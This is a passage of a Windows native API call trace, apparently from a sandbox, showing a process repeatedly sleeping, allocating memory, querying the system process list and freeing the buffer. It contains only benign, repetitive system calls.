NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.965] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.995] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.011] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.027] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.044] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.073] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.091] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.105] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.127] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.135] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.167] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.184] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.199] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.214] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.245] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.261] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.277] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 